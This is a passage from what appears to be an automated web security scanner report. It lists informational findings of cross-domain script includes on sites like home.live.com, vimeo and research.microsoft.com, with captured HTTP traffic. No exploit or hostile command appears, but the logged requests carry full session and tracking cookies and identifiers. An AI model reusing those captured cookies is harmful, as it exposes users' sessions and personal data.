http://msc.wlxrs.com/Zb!TZqMB7AnDRG!PwdG5PQ/js/InvitePopover.js
http://msc.wlxrs.com/sDSzhnAI0HbE94-7UyUFRA/Popover.js

Request

Response

19.39. http://home.live.com/search/hip previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.live.com
Path:	/search/hip

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.wlxrs.com/IW9RMFusiP7aP7lsSm5H9w/wlive.js
http://js.wlxrs.com/MDkCGfAXrMQjb2SY98x7WQ/comscore/beacon.js
http://js.wlxrs.com/_D/IW9RMFusiP7aP7lsSm5H9w/jquery-min.js
http://msc.wlxrs.com/MoMjyHwQMDDxLYHc4jzTKA/js/hipV3.js

Request

Response

19.40. http://ib.adnxs.com/if previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/if

Issue detail

The response dynamically includes the following scripts from other domains:

http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2711514&PluID=0&w=728&h=90&ord=1311271292&ucm=true&ncu=$$http://ib.adnxs.com/click?UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAQUCAQQAAAAAYibxlAAAAAA./cnd=!6QTzJwjfggYQgPwcGNHHASAA/referrer=http%3A%2F%2Fgames.myyearbook.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D$$&apui=1
http://c.betrad.com/surly.js?;ad_w=728;ad_h=90;coid=259;nid=1886;ecaid=ZapTraderB3/Panera/2011Q2/CS_DAL/728

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:01:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:01:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; path=/; expires=Wed, 19-Oct-2011 18:01:46 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 21 Jul 2011 18:01:46 GMT
Content-Length: 2773

<script>var gEbBAd = new Object();gEbBAd.AClickUrl = "http://t.mookie1.com/t/v1/clk?migAgencyId=66&migSource=mmind&migTrackDataExt=[%tp_AdID%];[%tp_PlacementID%]&migRandom=[ebRandom]&migTrackFmtExt=ad
...[SNIP]...
</script><script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2711514&PluID=0&w=728&h=90&ord=1311271292&ucm=true&ncu=$$http://ib.adnxs.com/click?UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAQUCAQQAAAAAYibxlAAAAAA./cnd=!6QTzJwjfggYQgPwcGNHHASAA/referrer=http%3A%2F%2Fgames.myyearbook.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D$$&apui=1"></script>
...[SNIP]...
</IFRAME><script type="text/javascript" src="http://c.betrad.com/surly.js?;ad_w=728;ad_h=90;coid=259;nid=1886;ecaid=ZapTraderB3/Panera/2011Q2/CS_DAL/728"></script>

19.41. http://keepitfresh.frid.ge/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://keepitfresh.frid.ge
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://edge.quantserve.com/quant.js
http://platform.twitter.com/widgets.js

Request

GET / HTTP/1.1
Host: keepitfresh.frid.ge
Proxy-Connection: keep-alive
Referer: http://frid.ge/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _fsc=2rk7v0mb4bj21uv0a4e096o6r4; __utma=113133011.849982528.1311368297.1311368297.1311368297.1; __utmb=113133011.2.10.1311368297; __utmc=113133011; __utmz=113133011.1311368297.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL"
X-Tumblr-User: keepitfresher
Link: <http://24.media.tumblr.com/avatar_438af12ace3b_16.png>; rel=icon
Vary: Accept-Encoding
X-Tumblr-Usec: D=258883
Content-Type: text/html; charset=UTF-8
Content-Length: 41236
Date: Fri, 22 Jul 2011 20:59:21 GMT
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>

<meta charset="utf-8" />
<meta name="Description" content="Simple personal networks that anyone can instantly create to share photos, messages, and even
...[SNIP]...
<link rel="alternate" type="application/rss+xml" href="http://keepitfresh.frid.ge/rss" />

<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<![endif]-->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.42. http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msdn.microsoft.com
Path:	/en-us/vstudio/ff431702.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.msn.com/library/dap.js

Request

GET /en-us/vstudio/ff431702.aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://visualstudiogallery.msdn.microsoft.com/site/search?f%5B0%5D.Type=User&f%5B0%5D.Value=Mike%20Barnett&f%5B1%5D.Type=Tag&f%5B1%5D.Value=Design%20by%20Contract&f%5B1%5D.Text=Design%20by%20Contract
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; WT_NVR=0=/:1=en-us:2=en-us/magazine; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; s_cc=true; s_sq=%5B%5BB%5D%5D; msdn=L=1033; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.NumberOfVisits=5&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=114&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=b6d6365d4e204cf6ab451e30a23dcb6b

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25543
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 02:07:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...

19.43. http://my.seashepherd.org/NetCommunity/Page.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.seashepherd.org
Path:	/NetCommunity/Page.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

Response

19.44. http://oascentral.discovery.com/RealMedia/ads/adstream_mjx.ads/www.treehugger.com/travel_nature//1683146035@x21,TopLeft,x29,x40,x41,x42,x43,x44,x45,x60,x61,x62,x63,x64,x65,x66,x67,x68,x69,x70 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.discovery.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.treehugger.com/travel_nature//1683146035@x21,TopLeft,x29,x40,x41,x42,x43,x44,x45,x60,x61,x62,x63,x64,x65,x66,x67,x68,x69,x70

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N5767.dsc.discoveryOX2348/B5649084.3;abr=!ie;sz=160x600;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/516812253/x29/DCI/6625_CT_Tower_Package_818963660/063011_PGCharm6640_DCI_HlthWellFemaleSelfImp_CT_Tower_3_17183412.html/7263485738303471796b67414345734b?;pc=OAS_17183412;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/516812253/x29/DCI/6625_CT_Tower_Package_818963660/063011_PGCharm6640_DCI_HlthWellFemaleSelfImp_CT_Tower_3_17183412.html/7263485738303471796b67414345734b?;ord=516812253?

Request

Response

19.45. http://player.vimeo.com/video/18305022 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.vimeo.com
Path:	/video/18305022

Issue detail

The response dynamically includes the following script from another domain:

http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?d512f

Request

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:19:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.118
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 8526
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Growing is Forever</title><!--[if lt IE 9]><style>.a.d .ab {display: block;}.a.d .bh {background: #000;filter: alpha(opacity='70');}</
...[SNIP]...
<link rel="stylesheet" href="http://a.vimeocdn.com/p/1.3.3/css/player.core.opt.css?d512f"><script src="http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?d512f"></script>
...[SNIP]...

19.46. http://player.vimeo.com/video/25752549 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.vimeo.com
Path:	/video/25752549

Issue detail

The response dynamically includes the following script from another domain:

http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?d512f

Request

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:43:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.115
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 7840
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>BIKE GUIDE</title><!--[if lt IE 9]><style>.a.d .ab {display: block;}.a.d .bh {background: #000;filter: alpha(opacity='70');}</style><!
...[SNIP]...
<link rel="stylesheet" href="http://a.vimeocdn.com/p/1.3.3/css/player.core.opt.css?d512f"><script src="http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?d512f"></script>
...[SNIP]...

19.47. http://player.vimeo.com/video/26341323 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.vimeo.com
Path:	/video/26341323

Issue detail

The response dynamically includes the following script from another domain:

http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?8d378

Request

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:59:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.118
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 7791
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Nosh: Three Dinners</title><!--[if lt IE 9]><style>.a.d .ab {display: block;}.a.d .bh {background: #000;filter: alpha(opacity='70');}<
...[SNIP]...
<link rel="stylesheet" href="http://a.vimeocdn.com/p/1.3.3/css/player.core.opt.css?8d378"><script src="http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?8d378"></script>
...[SNIP]...

19.48. http://player.vimeo.com/video/8022406 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.vimeo.com
Path:	/video/8022406

Issue detail

The response dynamically includes the following script from another domain:

http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?d512f

Request

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:43:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.115
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 8381
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>The Ballad of Marshall Mcluhan</title><!--[if lt IE 9]><style>.a.d .ab {display: block;}.a.d .bh {background: #000;filter: alpha(opaci
...[SNIP]...
<link rel="stylesheet" href="http://a.vimeocdn.com/p/1.3.3/css/player.core.opt.css?d512f"><script src="http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?d512f"></script>
...[SNIP]...

19.49. http://research.microsoft.com/en-us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/ HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/22/2011 15:41:39&Microsoft.VisitStartDate=07/22/2011 15:39:26&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=109&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 01:52:24 GMT
Content-Length: 71244

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible" con
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

19.50. http://research.microsoft.com/en-us/downloads/cecba376-3d3f-4eaf-bf01-20983857c2b1/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/downloads/cecba376-3d3f-4eaf-bf01-20983857c2b1/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/downloads/cecba376-3d3f-4eaf-bf01-20983857c2b1/default.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/22/2011 15:41:39&Microsoft.VisitStartDate=07/22/2011 15:39:26&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=109&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 01:52:47 GMT
Content-Length: 65589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible" con
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

19.51. http://research.microsoft.com/en-us/events/fs2011/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/events/fs2011/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/events/fs2011/default.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/downloads/cecba376-3d3f-4eaf-bf01-20983857c2b1/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/22/2011 15:41:39&Microsoft.VisitStartDate=07/22/2011 15:39:26&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=109&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 01:53:34 GMT
Content-Length: 74950

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible" con
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

19.52. http://research.microsoft.com/en-us/events/fs2011/demofest.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/events/fs2011/demofest.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/events/fs2011/demofest.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/events/fs2011/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
